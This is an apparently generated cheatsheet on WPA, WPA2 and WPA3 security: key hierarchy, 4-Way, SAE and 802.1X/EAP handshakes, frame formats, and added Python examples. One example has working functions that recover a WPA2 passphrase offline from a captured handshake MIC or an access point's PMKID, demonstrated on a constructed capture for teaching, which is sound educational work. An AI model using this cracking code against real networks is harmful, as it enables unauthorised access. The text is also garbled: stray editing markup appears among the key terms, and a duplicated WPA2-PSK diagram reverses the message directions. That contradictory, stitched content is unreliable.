
Wireless Security: WPA, WPA2, WPA3

Category: Network Security
Type: Network Concepts
Generated on: 2025-07-10 09:08:19
For: Network Engineering, Administration & Technical Interviews


This cheatsheet provides an overview of the Wi-Fi Protected Access protocols (WPA, WPA2, WPA3): the key hierarchy and handshakes behind them, frame formats, configuration examples, common pitfalls and troubleshooting tips.

What is it? Wi-Fi Protected Access (WPA, WPA2, WPA3) is the family of Wi-Fi Alliance security certifications, built on IEEE 802.11i and its successors, that replaced the broken Wired Equivalent Privacy (WEP). Each generation specifies how a client and an access point authenticate each other (a shared passphrase, an 802.1X/EAP credential, or the SAE password exchange), how they derive per-session keys, and which cipher protects the frames.

Why is it important? Radio is a shared medium: anyone in range receives every frame, and anyone can transmit. Without link-layer protection an attacker can read traffic, inject frames and join the network. WPA2 and WPA3 give every frame confidentiality and integrity and tie network access to a credential. The protocol version matters less than how it is deployed: a WPA2 network with a weak passphrase, or an Enterprise client that skips server certificate validation, is still open to attack.

Key Terms:

  • SSID (Service Set Identifier): The name of the wireless network. It also salts the PSK derivation, so the same passphrase on two SSIDs yields two different keys.
  • PSK (Pre-Shared Key): In Personal mode, a passphrase of 8-63 ASCII characters (or 64 hex digits) shared by every client. The 256-bit PSK is derived from it with PBKDF2-HMAC-SHA1 over the SSID (4096 iterations) and is used directly as the PMK.
  • Authentication: Verifying the identity of users or devices attempting to connect to the network.
  • Encryption: Encoding data so that only holders of the session key can read it.
  • TKIP (Temporal Key Integrity Protocol): A per-packet keying wrapper around RC4 introduced by WPA as a stopgap for WEP-era hardware; deprecated and not permitted in WPA3.
  • AES (Advanced Encryption Standard): The block cipher behind CCMP and GCMP in WPA2 and WPA3.
  • CCMP (Counter Mode with CBC-MAC Protocol): AES-based authenticated encryption (confidentiality plus integrity in one pass). Mandatory in WPA2 and still the cipher of WPA3-Personal (CCMP-128).
  • GCMP (Galois/Counter Mode Protocol): AES-GCM based authenticated encryption. GCMP-256 is the cipher of the WPA3-Enterprise 192-bit mode; it is cheaper to compute than CCMP because the tag computation is parallelisable.
  • MIC (Message Integrity Check): The integrity tag on each data frame (8 bytes for CCMP) and the HMAC on each EAPOL-Key handshake message; a wrong MIC means the sender does not hold the same key.
  • EAP (Extensible Authentication Protocol): A framework for authentication methods used in enterprise environments (WPA-Enterprise/WPA2-Enterprise/WPA3-Enterprise).
  • RADIUS (Remote Authentication Dial-In User Service): The protocol that carries EAP between the access point and a central authentication server, which returns the PMK to the access point on success.
  • PMK (Pairwise Master Key): The 256-bit long-lived secret of a session. It equals the PSK in Personal mode, is taken from the EAP method's Master Session Key (delivered by RADIUS) in Enterprise mode, and is the output of the SAE exchange in WPA3-Personal.
  • PTK (Pairwise Transient Key): Derived from the PMK, both MAC addresses and both nonces in the 4-Way Handshake; split into the KCK (handshake MICs), KEK (wrapping the group key) and TK (data encryption).
  • SAE (Simultaneous Authentication of Equals): The password-authenticated key exchange of WPA3-Personal, also known as the Dragonfly handshake. Every session yields a fresh PMK, giving forward secrecy, and a captured exchange gives an eavesdropper no way to test passphrase guesses offline.
  • Forward Secrecy: A later compromise of the long-term secret (the passphrase) does not let an attacker decrypt sessions captured earlier, because the session keys were derived from per-session randomness rather than from the secret alone.
  • Management Frame Protection (MFP, 802.11w): Adds a MIC to deauthentication, disassociation and action frames so they cannot be forged, which defeats the classic deauthentication denial of service. Optional in WPA2, mandatory in WPA3.
</gr_repl>
<gr_replace lines="34-51" cat="clarify" orig="WPA2-PSK">
WPA2-PSK (Personal):

Client <---> Access Point
| |
1. Open System Authentication (always succeeds; the real check is the handshake)
|------->|
|<-------|
2. Association Request / Response
|------->|
|<-------|
3. 4-Way Handshake (EAPOL-Key frames, EtherType 0x888E)
|<-------| Message 1: ANonce (optionally a PMKID)
|------->| Message 2: SNonce, RSN IE, MIC
|<-------| Message 3: ANonce, RSN IE, GTK encrypted with the KEK, MIC
|------->| Message 4: MIC (confirms key install)
| |
4. Data Encryption using the PTK (unicast) and the GTK (broadcast/multicast)
  1. Authentication and Association: The client authenticates with the open system algorithm (no credential involved) and associates. At this point no key exists and the controlled port stays blocked, so no data can flow.
  2. 4-Way Handshake: The access point sends a random ANonce. The client picks its own SNonce, computes PTK = PRF-384(PMK, "Pairwise key expansion", MACs, nonces) and answers with the SNonce and a MIC under the KCK part of the PTK. The access point now has everything it needs to derive the same PTK and verify the MIC, which proves the client holds the PMK; it then sends the GTK wrapped with the KEK under a MIC of its own, proving the same in the other direction, and the client acknowledges. The PMK never crosses the air, but the MIC on message 2 can be recomputed from values that do (both MACs, both nonces), which is what offline passphrase attacks exploit.
  3. Data Encryption: The TK part of the PTK protects unicast frames with CCMP; the GTK protects group frames. Both are replaced on every reassociation.

WPA2-PSK (Personal):

Client <---> Access Point
| |
1. Association Request
|------->|
2. Association Response
|<-------|
3. 4-Way Handshake (EAPOL)
|------->| Message 1: ANonce
|<-------| Message 2: SNonce, MIC
|------->| Message 3: MIC
|<-------| Message 4: MIC
| |
4. Data Encryption using PTK
  1. Association: The client associates with the access point.
  2. 4-Way Handshake: The client and access point exchange messages to derive the Pairwise Transient Key (PTK). This handshake uses the ANonce (AP Nonce), SNonce (Supplicant Nonce), and the PMK (Pairwise Master Key). The MIC (Message Integrity Check) ensures message integrity.
  3. Data Encryption: Data is encrypted using the PTK.
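The key hierarchy behind steps 2 and 3, as an added example that is not code from the page or from any vendor: PBKDF2 turns the passphrase into the PMK, the 802.11 PRF expands it into the PTK, and the KCK part of the PTK produces the MIC on message 2. Because an eavesdropper sees both MACs, both nonces and the MIC, a captured handshake is a test oracle for passphrase guesses; the same code shows the PMKID shortcut from the pitfalls list later on the page, which needs only message 1. The MACs, nonces and the "captured" frame are constructed in the file (its MIC is computed with the real passphrase so the check can be exercised offline); the passphrase/SSID pair is the IEEE 802.11i test vector.

```python
"""WPA2-PSK key hierarchy and 4-Way Handshake MIC check, with the offline
dictionary attack that follows from it (and the PMKID variant that needs only
message 1).  Added example, not code from the page or any vendor.  The
"captured" M2 is CONSTRUCTED by this file with the real passphrase so that it
runs offline; MACs and nonces are made-up values."""
import hashlib, hmac, struct

def derive_pmk(passphrase, ssid):
    # PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits); in PSK mode PMK = PSK
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)

def prf(key, label, data, nbytes):
    # IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range((nbytes + 19) // 20))
    return out[:nbytes]

def derive_ptk(pmk, aa, spa, anonce, snonce):
    # PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}   # CCMP-128 split

def pmkid(pmk, aa, spa):
    # PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA); an AP may send it in M1's Key Data
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]

MIC_OFF = 4 + 77   # EAPOL header, then the descriptor fields that precede Key MIC

def eapol_key_mic(kck, frame):
    # Key Descriptor Version 2 (CCMP with the PSK AKM): HMAC-SHA1 over the whole
    # EAPOL frame with the Key MIC field zeroed, truncated to 128 bits
    zeroed = frame[:MIC_OFF] + b"\x00" * 16 + frame[MIC_OFF + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]

def build_m2(snonce, replay_counter, kck):
    # constructed M2: descriptor 2 (RSN), Key Information 0x010a = version 2 | Pairwise | MIC,
    # key length 16, SNonce, zero IV/RSC/reserved (32 bytes), MIC slot, empty Key Data
    body = struct.pack("!BHHQ", 2, 0x010A, 16, replay_counter) + snonce + b"\x00" * 32 + b"\x00" * 16 + b"\x00\x00"
    frame = struct.pack("!BBH", 1, 3, len(body)) + body
    return frame[:MIC_OFF] + eapol_key_mic(kck, frame) + frame[MIC_OFF + 16:]

def passphrase_matches(passphrase, ssid, aa, spa, anonce, snonce, m2):
    # Everything needed to recompute M2's MIC is public except the PMK, so a
    # captured M1/M2 pair lets anyone test passphrase guesses offline.
    kck = derive_ptk(derive_pmk(passphrase, ssid), aa, spa, anonce, snonce)["kck"]
    return hmac.compare_digest(eapol_key_mic(kck, m2), m2[MIC_OFF:MIC_OFF + 16])

def recover_passphrase(wordlist, ssid, aa, spa, anonce, snonce, m2):
    return next((w for w in wordlist if passphrase_matches(w, ssid, aa, spa, anonce, snonce, m2)), None)

def recover_from_pmkid(wordlist, ssid, aa, spa, captured_pmkid):
    # PMKID variant: no client and no handshake needed, only M1 from the AP
    return next((w for w in wordlist if pmkid(derive_pmk(w, ssid), aa, spa) == captured_pmkid), None)

# Constructed scenario: 802.11i test-vector passphrase/SSID, made-up MACs and nonces
SSID, PASSPHRASE = "IEEE", "password"
AA, SPA = bytes.fromhex("02aabbccddee"), bytes.fromhex("021122334455")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
_PTK = derive_ptk(derive_pmk(PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
CAPTURED_M2 = build_m2(SNONCE, 1, _PTK["kck"])
CAPTURED_PMKID = pmkid(derive_pmk(PASSPHRASE, SSID), AA, SPA)
WORDLIST = ["letmein", "wifi1234", "password", "correcthorse"]

if __name__ == "__main__":
    print("PMK:", derive_pmk(PASSPHRASE, SSID).hex())
    print("recovered via M2 MIC:", recover_passphrase(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_M2))
    print("recovered via PMKID:", recover_from_pmkid(WORDLIST, SSID, AA, SPA, CAPTURED_PMKID))
```

Each guess costs one PBKDF2 run (4096 SHA-1 rounds), which is exactly the work a GPU cracker parallelises; the SSID salt only stops precomputed tables from being shared across networks. SAE breaks this model because the PMK is no longer a function of the passphrase and public values alone.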

WPA3-SAE (Personal):

Client <---> Access Point
| |
1. SAE Handshake (Dragonfly), carried in 802.11 Authentication frames
|------->| Commit: group ID, scalar, element
|<-------| Commit: group ID, scalar, element
|------->| Confirm: send-confirm counter, confirm hash
|<-------| Confirm: send-confirm counter, confirm hash
2. Association Request / Response
|------->|
|<-------|
3. 4-Way Handshake (same messages as WPA2, PMK taken from SAE)
|<-------| Message 1: ANonce
|------->| Message 2: SNonce, MIC
|<-------| Message 3: GTK encrypted with the KEK, MIC
|------->| Message 4: MIC
| |
4. Data Encryption using PTK
  1. SAE Handshake: Runs before association, inside the 802.11 authentication exchange (authentication algorithm 3). Each side derives a password element (PWE) from the passphrase and both MAC addresses, chooses a random rand and mask, and sends Commit with scalar = rand + mask and element = PWE^(-mask). From the peer's Commit each side computes the same shared secret PWE^(rand_a * rand_b) and derives a KCK and a fresh PMK from it. Confirm is an HMAC under the KCK over both Commits, so a wrong passphrase is detected here, and nothing in the exchange lets an observer test passphrase guesses offline: an attacker gets one guess per active attempt.
  2. Association: The client associates with the access point as in WPA2.
  3. 4-Way Handshake: The message flow is identical, but the PMK is the SAE output (with SHA-256 based key derivation under the SAE AKM), not PBKDF2 of the passphrase. A captured handshake or PMKID is therefore useless for guessing, and a later passphrase leak does not decrypt past sessions.
  4. Data Encryption: CCMP-128 as in WPA2; management frame protection is mandatory.
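The Commit/Confirm exchange above with both sides driven in one process, as an added toy implementation (not hostapd or wpa_supplicant code, and not from the page). It assumes a 64-bit finite-field safe-prime group found at import time instead of the NIST P-256 curve real deployments use, and 8-byte encodings; the password element search, key derivation and Confirm follow the 802.11 definitions (H = HMAC-SHA256 with an all-zero key, KDF-Hash-Length), but the group is far too small for real use and the code is not constant-time.

```python
"""Toy SAE (Dragonfly) exchange, both sides in one process.  Added example:
not hostapd/wpa_supplicant code and not from the page.  Assumptions: a 64-bit
safe-prime finite-field group searched for at import time (real SAE uses NIST
P-256 or RFC 3526/5114 MODP groups), H = HMAC-SHA256 with an all-zero key and
the 802.11 KDF, 8-byte big-endian encodings.  Not constant-time: the password
element loop leaks timing, the weakness behind the Dragonblood attacks that
led WPA3 to add the hash-to-element method."""
import hashlib, hmac, secrets, struct

BASES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41)   # Miller-Rabin is exact with these below 3.3e24

def is_prime(n):
    if n < 2:
        return False
    if any(n % b == 0 for b in BASES):
        return n in BASES
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for a in BASES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = x * x % n
            if x == n - 1:
                break
        else:
            return False
    return True

def next_safe_prime(n):
    p = n | 1
    while not (is_prime(p) and is_prime(p >> 1)):
        p += 2
    return p

P = next_safe_prime(1 << 63)   # toy group: p = 2q + 1, the squares form the order-q subgroup
Q = P >> 1
N = 8                          # byte length of scalars and elements on the wire

def H(data):
    return hmac.new(b"\x00" * 32, data, hashlib.sha256).digest()

def kdf(key, label, context, nbytes):
    # IEEE 802.11 KDF-Hash-Length: HMAC(key, i || label || context || length in bits), i = 1, 2, ...
    blocks = (hmac.new(key, struct.pack("<H", i) + label + context + struct.pack("<H", nbytes * 8), hashlib.sha256).digest()
              for i in range(1, (nbytes + 31) // 32 + 1))
    return b"".join(blocks)[:nbytes]

def derive_pwe(mac_a, mac_b, password):
    # hunting and pecking: hash (MACs, password, counter) until a value < p appears,
    # then map it into the order-q subgroup; real code runs a fixed number of rounds
    for counter in range(1, 256):
        seed = H(max(mac_a, mac_b) + min(mac_a, mac_b) + password + bytes([counter]))
        val = int.from_bytes(kdf(seed, b"SAE Hunting and Pecking", P.to_bytes(N, "big"), N), "big")
        if val < P and pow(val, (P - 1) // Q, P) > 1:
            return pow(val, (P - 1) // Q, P)
    raise ValueError("no password element found")

class SaeParty:
    def __init__(self, mac, peer_mac, password):
        self.pwe = derive_pwe(mac, peer_mac, password)
        self.send_confirm = 0

    def commit(self):
        # scalar = rand + mask mod q, element = PWE^(-mask); the mask is discarded after use
        while True:
            self.rand, mask = 2 + secrets.randbelow(Q - 2), 2 + secrets.randbelow(Q - 2)
            self.scalar = (self.rand + mask) % Q
            if self.scalar > 1:
                break
        self.element = pow(pow(self.pwe, mask, P), -1, P)
        return self.scalar, self.element

    def process_commit(self, peer_scalar, peer_element):
        # reject out-of-range scalars, elements outside the order-q subgroup, and a reflected commit
        if not 1 < peer_scalar < Q or not 1 < peer_element < P or pow(peer_element, Q, P) != 1:
            raise ValueError("invalid peer commit")
        if (peer_scalar, peer_element) == (self.scalar, self.element):
            raise ValueError("reflected commit")
        # K = (PWE^peer_scalar * peer_element)^rand = PWE^(rand * peer_rand), identical on both sides
        k = pow(pow(self.pwe, peer_scalar, P) * peer_element % P, self.rand, P)
        context = ((self.scalar + peer_scalar) % Q).to_bytes(N, "big")
        keys = kdf(H(k.to_bytes(N, "big")), b"SAE KCK and PMK", context, 64)
        self.kck, self.pmk = keys[:32], keys[32:]
        self.peer_scalar, self.peer_element = peer_scalar, peer_element

    def _cn(self, send_confirm, *values):
        data = struct.pack("<H", send_confirm) + b"".join(v.to_bytes(N, "big") for v in values)
        return hmac.new(self.kck, data, hashlib.sha256).digest()

    def confirm(self):
        # proves possession of the KCK and binds both commits; a wrong password fails here
        return self.send_confirm, self._cn(self.send_confirm, self.scalar, self.element, self.peer_scalar, self.peer_element)

    def verify_confirm(self, peer_send_confirm, peer_confirm):
        expected = self._cn(peer_send_confirm, self.peer_scalar, self.peer_element, self.scalar, self.element)
        return hmac.compare_digest(expected, peer_confirm)

def run_sae(sta_password, ap_password, sta_mac=b"\x02\x11\x22\x33\x44\x55", ap_mac=b"\x02\xaa\xbb\xcc\xdd\xee"):
    """Drive both sides; returns (both Confirms verified, PMKs equal)."""
    sta, ap = SaeParty(sta_mac, ap_mac, sta_password), SaeParty(ap_mac, sta_mac, ap_password)
    sta_commit, ap_commit = sta.commit(), ap.commit()
    ap.process_commit(*sta_commit)
    sta.process_commit(*ap_commit)
    ok = ap.verify_confirm(*sta.confirm()) and sta.verify_confirm(*ap.confirm())
    return ok, sta.pmk == ap.pmk

if __name__ == "__main__":
    print("same password:", run_sae(b"correct horse battery", b"correct horse battery"))
    print("wrong password:", run_sae(b"correct horse battery", b"Tr0ub4dor&3"))
```

Note what an eavesdropper sees: two scalars and two elements, each masked by a random value that is never sent. Without a mask there is no equation to test a passphrase guess against, so the only way to try a guess is to run the exchange and be refused at Confirm, which the access point can rate-limit. The subgroup and reflection checks in process_commit are the ones real implementations have been bitten by.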

WPA2/WPA3-Enterprise (802.1X/EAP):

Client <---> Access Point <---> RADIUS Server
| | |
1. Open System Authentication + Association
|<------>| |
2. EAP over EAPOL (client <-> AP), relayed inside RADIUS (AP <-> server)
|<-------| | EAP-Request/Identity
|------->| | EAP-Response/Identity
| |------->| RADIUS Access-Request (EAP-Message, Message-Authenticator)
| |<-------| RADIUS Access-Challenge (next EAP-Request)
|<-------| | EAP-Request (e.g. a TLS handshake step)
|------->| | EAP-Response ... repeated until the method completes
| |------->| RADIUS Access-Request
| |<-------| RADIUS Access-Accept (EAP-Success, MS-MPPE-Recv/Send-Key) or Access-Reject
|<-------| | EAP-Success / EAP-Failure
3. 4-Way Handshake (same as WPA2-PSK, PMK from the EAP method)
|<-------|
|------->|
|<-------|
|------->|
| |
4. Data Encryption using PTK
  1. Association: The client associates with the access point; the 802.1X controlled port stays blocked until EAP succeeds.
  2. EAP Authentication: The access point is only a pass-through authenticator. The EAP conversation runs end to end between the supplicant and the RADIUS server, carried in EAPOL on the air and in RADIUS EAP-Message attributes on the wire. At the end both derive the Master Session Key; the server hands its first 256 bits, the PMK, to the access point inside the Access-Accept (MS-MPPE-Recv-Key, encrypted with the RADIUS shared secret). Common methods: EAP-TLS (client and server certificates, the strongest), PEAP and EAP-TTLS (server certificate, then a tunnelled password method). Clients must validate the server certificate: otherwise a rogue access point with its own RADIUS server harvests the inner credentials.
  3. 4-Way Handshake: Proceeds as in WPA2-PSK, but every client has its own PMK, so clients cannot decrypt each other's traffic and one user's compromise does not affect the rest.
  4. Data Encryption: Data is encrypted using the PTK.
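The access-point-to-RADIUS leg of step 2, as an added example (not from the page, and not FreeRADIUS, hostapd or Cisco code): the access point wraps the client's EAP-Response/Identity in an Access-Request, signs it with Message-Authenticator, and later checks the Response Authenticator on whatever comes back; the server checks the request the same way. The shared secret, identity, MAC address and EAP payloads are constructed. Both checks depend on the RADIUS shared secret, which is why a wrong secret looks like silence rather than a reject, and why the forged Access-Accept at the end is dropped.

```python
"""RADIUS carrying the EAP conversation between the AP (the NAS) and the
authentication server, with the two integrity checks each side applies.
Added example; not FreeRADIUS, hostapd or Cisco code and not from the page.
Shared secret, identity, MAC and EAP payloads are constructed here."""
import hashlib, hmac, os, struct

ACCESS_REQUEST, ACCESS_ACCEPT, ACCESS_REJECT, ACCESS_CHALLENGE = 1, 2, 3, 11
USER_NAME, CALLING_STATION_ID, NAS_PORT_TYPE, EAP_MESSAGE, MSG_AUTH = 1, 31, 61, 79, 80
WIRELESS_80211 = 19            # NAS-Port-Type value for Wi-Fi

def attr(t, value):
    # RADIUS attribute: Type(1) Length(1, header included) Value
    return struct.pack("!BB", t, 2 + len(value)) + value

def eap_response_identity(eap_id, identity):
    # EAP: Code(1)=2 Response, Identifier(1), Length(2), Type(1)=1 Identity, identity bytes
    return struct.pack("!BBH", 2, eap_id, 5 + len(identity)) + b"\x01" + identity

def build_access_request(secret, pkt_id, request_auth, identity, client_mac, eap):
    # The AP relays the EAP packet in EAP-Message and signs the whole RADIUS packet:
    # Message-Authenticator = HMAC-MD5(secret, packet with that attribute zeroed).
    # It is mandatory whenever EAP-Message is present (RFC 3579).
    attrs = (attr(USER_NAME, identity) + attr(NAS_PORT_TYPE, struct.pack("!I", WIRELESS_80211))
             + attr(CALLING_STATION_ID, client_mac) + attr(EAP_MESSAGE, eap) + attr(MSG_AUTH, b"\x00" * 16))
    pkt = struct.pack("!BBH", ACCESS_REQUEST, pkt_id, 20 + len(attrs)) + request_auth + attrs
    mac = hmac.new(secret, pkt, hashlib.md5).digest()
    return pkt[:-18] + attr(MSG_AUTH, mac)      # Message-Authenticator is the last attribute

def find_attr(pkt, wanted):
    # walk the TLVs after the 20-byte header; returns the offset of the first match
    off = 20
    while off + 2 <= len(pkt):
        t, length = pkt[off], pkt[off + 1]
        if length < 2:
            raise ValueError("malformed attribute")
        if t == wanted:
            return off
        off += length
    return None

def verify_message_authenticator(secret, pkt):
    # Server side: a request with EAP-Message but no valid Message-Authenticator is silently dropped
    off = find_attr(pkt, MSG_AUTH)
    if off is None:
        return False
    zeroed = pkt[:off + 2] + b"\x00" * 16 + pkt[off + 18:]
    return hmac.compare_digest(hmac.new(secret, zeroed, hashlib.md5).digest(), pkt[off + 2:off + 18])

def build_response(secret, code, request, attrs):
    # Response Authenticator = MD5(Code | ID | Length | RequestAuthenticator | Attributes | Secret)
    head = struct.pack("!BBH", code, request[1], 20 + len(attrs))
    return head + hashlib.md5(head + request[4:20] + attrs + secret).digest() + attrs

def verify_response(secret, request, response):
    # AP side: ties the reply to the request it sent and to the shared secret, so a spoofed
    # Access-Accept from a host that lacks the secret (or answers the wrong request) is ignored
    if response[1] != request[1]:
        return False
    expected = hashlib.md5(response[:4] + request[4:20] + response[20:] + secret).digest()
    return hmac.compare_digest(expected, response[4:20])

def demo(secret=b"s3cr3t-shared", attacker_secret=b"guess"):
    """Returns (request accepted by server, challenge accepted by AP, forged accept accepted by AP)."""
    eap = eap_response_identity(1, b"alice@example.com")
    req = build_access_request(secret, 7, os.urandom(16), b"alice@example.com", b"02-11-22-33-44-55", eap)
    # EAP-Request/PEAP Start (type 25, S flag) as the server's first challenge; a real server
    # also puts a Message-Authenticator on Challenge/Accept packets that carry EAP-Message
    challenge = build_response(secret, ACCESS_CHALLENGE, req, attr(EAP_MESSAGE, bytes([1, 2, 0, 6, 25, 0x20])))
    forged = build_response(attacker_secret, ACCESS_ACCEPT, req, b"")
    return (verify_message_authenticator(secret, req), verify_response(secret, req, challenge),
            verify_response(secret, req, forged))

if __name__ == "__main__":
    print("request ok, challenge ok, forged accept ok:", demo())
```

Note that both authenticators are MD5 based and the MS-MPPE keys in the Accept are hidden with an MD5 keystream derived from the secret, so RADIUS between access point and server should run over a dedicated management VLAN, IPsec or RadSec (RADIUS over TLS), and the shared secret should be long and random.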

WPA2 Data Frame Format (Simplified):

802.11 MAC Header | CCMP Header (8 bytes: packet number, Key ID) | Encrypted Payload | MIC (8 bytes) | FCS
  • 802.11 MAC Header: Frame Control, Duration, addresses, Sequence Control. Sent in the clear, but most of it is covered by the MIC as additional authenticated data, so it cannot be altered undetected.
  • CCMP Header: Carries the 48-bit packet number that serves as the AES-CCM nonce. A receiver drops any frame whose packet number does not increase, which is the replay protection.
  • Encrypted Payload: The LLC/SNAP header plus the data, encrypted with the TK (unicast) or the GTK (group frames). The EAPOL-Key frames of the 4-Way Handshake are ordinary data frames with EtherType 0x888E; they are sent before the TK is installed and are therefore not encrypted at this layer (message 3 protects the GTK inside Key Data with the KEK instead).
  • MIC: 8-byte CBC-MAC tag over the header fields and payload, computed with the TK; a frame with a bad MIC is discarded.
  • FCS: CRC-32 for error detection only; it has no security value.

EAPOL-Key Frame (Simplified):

EAPOL Header (Version | Type = 3 | Body Length) | Descriptor Type | Key Information | Key Length | Key Replay Counter | Key Nonce | EAPOL-Key IV | Key RSC | Reserved | Key MIC | Key Data Length | Key Data
  • Descriptor Type: 2 for RSN (WPA2 and WPA3), 254 for the original WPA.
  • Key Information: 16 bits of flags: Key Descriptor Version (1 = HMAC-MD5/RC4, 2 = HMAC-SHA1/AES key wrap, 3 = AES-128-CMAC), Key Type (pairwise or group), Install, Key ACK, Key MIC, Secure, Error, Request, Encrypted Key Data. The flag combination identifies which of the four messages a frame is (message 1: Pairwise + ACK; 2: Pairwise + MIC; 3: Pairwise + ACK + Install + MIC + Secure; 4: Pairwise + MIC + Secure).
  • Key Length: Length of the temporal key in bytes (16 for CCMP-128).
  • Key Replay Counter: 64-bit counter the access point increments for each new message and the client echoes; a message with a stale counter is dropped, which is the handshake's replay protection.
  • Key Nonce: ANonce in messages 1 and 3, SNonce in message 2; fresh for every handshake, so a PTK is never reused.
  • EAPOL-Key IV: Initialisation vector for RC4 key wrapping (descriptor version 1 only); zero with AES key wrap.
  • Key RSC: Receive sequence counter (starting packet number) for the GTK delivered in message 3.
  • Key MIC: 16 bytes, computed with the KCK over the whole EAPOL frame with this field zeroed; all zero in message 1 because no key exists yet.
  • Key Data Length / Key Data: RSN IE, GTK KDE (encrypted with the KEK in message 3), and optionally a PMKID KDE in message 1.
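A parser for the layout above, as an added example (not Wireshark, scapy or hostapd code, and not from the page): it validates the EAPOL and Key Data lengths, tells messages 1 to 4 apart from the Key Information flags, walks the KDEs in Key Data and pulls out the PMKID an access point may send in message 1. The M1 it parses is constructed in the file.

```python
"""Parse EAPOL-Key frames, identify which 4-Way Handshake message each one is
from its Key Information bits, and extract the PMKID KDE from message 1.
Added example (not from the page, not Wireshark/hostapd code); the M1 frame
built at the bottom is CONSTRUCTED so the file runs offline."""
import struct
from collections import namedtuple

HEADER = struct.Struct("!BBH")                   # EAPOL: version, type (3 = EAPOL-Key), body length
BODY = struct.Struct("!BHHQ32s16s8s8s16sH")      # descriptor type .. Key Data Length (95 bytes)
EapolKey = namedtuple("EapolKey", "version descriptor key_info key_length replay_counter nonce iv rsc mic key_data")

# Key Information bits (IEEE 802.11-2016, 12.7.2)
KI_VERSION, KI_PAIRWISE, KI_INSTALL, KI_ACK, KI_MIC, KI_SECURE = 0x0007, 0x0008, 0x0040, 0x0080, 0x0100, 0x0200
KI_ERROR, KI_REQUEST, KI_ENCRYPTED = 0x0400, 0x0800, 0x1000
RSN_OUI, KDE_GTK, KDE_PMKID = b"\x00\x0f\xac", 1, 4

def parse_eapol_key(frame):
    if len(frame) < HEADER.size + BODY.size:
        raise ValueError("frame too short for an EAPOL-Key body")
    version, ptype, blen = HEADER.unpack_from(frame)
    if ptype != 3:
        raise ValueError("not an EAPOL-Key packet (type %d)" % ptype)
    if blen != len(frame) - HEADER.size:
        raise ValueError("EAPOL length field does not match the frame")
    desc, ki, klen, replay, nonce, iv, rsc, _reserved, mic, kdlen = BODY.unpack_from(frame, HEADER.size)
    if desc not in (2, 254):
        raise ValueError("descriptor %d is neither RSN (2) nor WPA (254)" % desc)
    key_data = frame[HEADER.size + BODY.size:]
    if len(key_data) != kdlen:
        raise ValueError("Key Data Length %d but %d bytes present" % (kdlen, len(key_data)))
    return EapolKey(version, desc, ki, klen, replay, nonce, iv, rsc, mic, key_data)

def classify_key_info(ki):
    """Map the flag combination to handshake message 1-4, 'group' or 'unknown'."""
    if not ki & KI_PAIRWISE:
        return "group"                               # group key handshake
    ack, mic, install, secure = ki & KI_ACK, ki & KI_MIC, ki & KI_INSTALL, ki & KI_SECURE
    if ack and not mic:
        return 1                                     # AP -> STA: ANonce, no key yet so no MIC
    if mic and not ack and not install and not secure:
        return 2                                     # STA -> AP: SNonce, first MIC
    if ack and mic and install:
        return 3                                     # AP -> STA: install, GTK in encrypted Key Data
    if mic and not ack and secure:
        return 4                                     # STA -> AP: acknowledges the install
    return "unknown"

def kdes(key_data):
    """Yield (type, payload) for each 00-0F-AC KDE in Key Data, and ('rsn', ie) for the RSN IE."""
    off = 0
    while off + 2 <= len(key_data):
        eid, elen = key_data[off], key_data[off + 1]
        body = key_data[off + 2:off + 2 + elen]
        if len(body) != elen:
            raise ValueError("truncated element in Key Data")
        if eid == 0xDD and body[:3] == RSN_OUI:
            yield body[3], body[4:]
        elif eid == 0x30:
            yield "rsn", body
        off += 2 + elen

def pmkid_from_m1(frame):
    k = parse_eapol_key(frame)
    if classify_key_info(k.key_info) != 1:
        return None
    return next((payload for t, payload in kdes(k.key_data) if t == KDE_PMKID), None)

def build_m1(anonce, pmkid, replay_counter=1):
    # constructed M1: descriptor 2, Key Information 0x008a = version 2 | Pairwise | ACK, zero MIC,
    # Key Data = PMKID KDE (0xdd, length 20, OUI 00-0F-AC, data type 4, 16-byte PMKID)
    kd = b"\xdd" + bytes([4 + len(pmkid)]) + RSN_OUI + bytes([KDE_PMKID]) + pmkid
    body = BODY.pack(2, 0x008A, 16, replay_counter, anonce, b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, b"\x00" * 16, len(kd)) + kd
    return HEADER.pack(2, 3, len(body)) + body

if __name__ == "__main__":
    m1 = build_m1(bytes(range(32)), bytes.fromhex("00112233445566778899aabbccddeeff"))
    k = parse_eapol_key(m1)
    print("message", classify_key_info(k.key_info), "descriptor version", k.key_info & KI_VERSION,
          "PMKID", pmkid_from_m1(m1).hex())
```

The length checks are not pedantry: an EAPOL-Key body whose Key Data Length exceeds the frame is exactly the shape of input that has crashed supplicant and driver parsers, so a tool that reads captures should reject it rather than index past the buffer.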

WPA3 SAE Commit and Confirm Frames:

Both are 802.11 Authentication frames with authentication algorithm number 3 (SAE). The Commit frame (transaction sequence 1) carries the Finite Cyclic Group identifier (19 = NIST P-256 in practice), the Scalar, the Element (an elliptic-curve point, or an integer for finite-field groups), optionally an Anti-Clogging Token that the access point can demand before doing the expensive Commit processing, so that flooding it with bogus Commits costs the sender a round trip each, and optionally a Password Identifier. The Confirm frame (transaction sequence 2) carries the Send-Confirm counter and the Confirm value. The frame contents and the Dragonfly computation are defined in IEEE 802.11-2016 clause 12.4 (first specified for mesh in 802.11s-2011).

Use Cases:

